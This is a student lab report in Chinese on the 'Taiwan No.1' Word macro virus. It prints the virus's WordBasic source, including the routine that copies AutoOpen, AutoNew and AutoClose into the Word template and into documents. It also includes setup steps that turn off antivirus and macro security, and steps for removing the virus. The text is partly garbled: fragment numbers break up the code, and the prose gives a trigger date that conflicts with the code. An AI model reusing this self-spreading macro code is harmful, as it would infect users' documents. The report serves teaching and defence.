计算机病毒原理台湾1号病毒实验报告.docx

1、计算机病毒原理台湾1号病毒实验报告计 算 机 病 毒实验报告姓 名：学 号:老 师：日 期：一. 实验目的台湾1号病毒是一种破坏力较大的宏病毒！Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过台湾1号病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。二. 实验内容1. macro virus中的内容 2.计算机病毒篇 -计算机宏病毒 三. 实验环境1. macro virus硬件设备：局域网，终端PC机。系统软件：Windows系列操作系统支撑软件：Word 2003软件设置：关

2、闭杀毒软；打开Word 2003，在工具 宏 安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问.实验环境配置如下图所示：2.计算机宏病毒硬件设备：部署 WIN2003 系统的PC 机一台软件工具：Office word2007四实验步骤及截图台湾1号病毒代码Taiwan No.1 病毒原始码 Dim Shared nm(4) Sub MAIN DisableInput 1 If Day(Now() = 13 Then try: On Error Goto 0 On Error Goto try test = -

3、1 con = 1 tog$ = i = 0 While test = - 1 For i = 0 To 4 nm(i) = Int(Rnd() * 10000) con = (con * nm(i) If i = 4 Then tog$ = tog$ + Str$(nm(4) + =? Goto beg End If tog$ = tog$ + Str$(nm(i) + * Next i rem 随机选出四个千位数, 以便等一下的游戏 beg: Beep rem 电脑发出 哔 一声 ans$ = InputBox$(今天是 + Date$() + ,跟你玩一个心算游戏 + Chr$(13)

4、+ / 若你答错,只好接受震撼教育. + Chr$(13) + / tog$, 台湾 NO.1 Macro Virus) rem 开个对话盒, 以便输入解答用 If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then MsgBox 恭贺你答对了,按确定就告诉你想知道的., / 台湾 NO.1 Macro Virus FileNewDefault CenterPara FormatFont .Font = 细明体, .Points = 16, .Bold = 1, .Underline = 1 Beep Insert 何谓巨集病毒？ InsertPara Be

5、ep Insert 答案: Italic 1 Insert 我就是. InsertPara InsertPara Italic 0 FormatFont .Font = 细明体, .Points = 16, .Bold = 1, .Underline = 1 Beep Insert 如何预防巨集病毒？ InsertPara Beep Insert 答案: Italic 1 Insert 不要看我. Goto exit Else For j = 1 To 20 Beep FileNewDefault Next j CenterPara FormatFont .Font = 细明体, .Point

6、s = 16, .Bold = 1, .Underline = 1 Insert 巨集病毒 Goto try End If Wend End If nor = CountMacros(0) If nor 0 Then For kk = 1 To nor If MacroName$(kk, 0) = AutoOpen Then t = 1 End If Next kk End If file$ = FileName$() filem$ = file$ + :AutoOpen If t 1 Then MacroCopy filem$, AutoOpen MacroCopy filem$, Auto

7、New MacroCopy filem$, AutoClose End If nor1 = CountMacros(1) If nor1 0 Then For kkk = 1 To nor1 If MacroName$(kkk, 1) = AutoOpen Then tt = 1 End If Next kkk End If If tt 1 Then FileSaveAs .Format = 1 MacroCopy AutoOpen, filem$ End If exit: End Sub该病毒的效果如下：当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是

8、1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕：何谓宏病毒答案：我就是.将系统日期设为XX月1号如果答错，就会不停地刷屏，然后继续让你答题，否则跳出如下界面:计算机宏病毒1). 新建Word 文档并打开2). 调出开发工具,设置宏的等级，启用宏3). 创建宏，命名AutoExec 编辑4). 编辑宏，语法上注意VBA 版本保存5). 关闭所有Word（必须）6). 再次打开Word 文档，宏病毒爆发,弹出刚刚编写的 msgbox 窗口7). 启动任务管理器结束进程搜索 winwor

9、d.exe 文件，并确定复制其位置8). 启用CMD,定位winword 位置：输入命令，用参数来打开安全模式winword.exe /a（执行此命令2 次）第一次安全模式第二次新建文档进行宏的打开设置 来禁用宏9). 搜索normal.dotm 等模板文件，若搜索不出东西，在高级选项中选中搜索隐藏文件及系统文件即可，并删除那个文件夹下的所有模板10). 简易摆脱宏完成，重新打开word,没有被感染。五. 总结与心得在使用电脑的过程中，我们要加强电脑的安全指数，要有防范意识，防止网络病毒的入侵！特别是在现代网络发达的社会，一旦被高级病毒入侵，很有可能带来重大损失！同时也应该学好病毒知识，这样，我们就可以知道如何去解决病毒问题，让我们免受损失！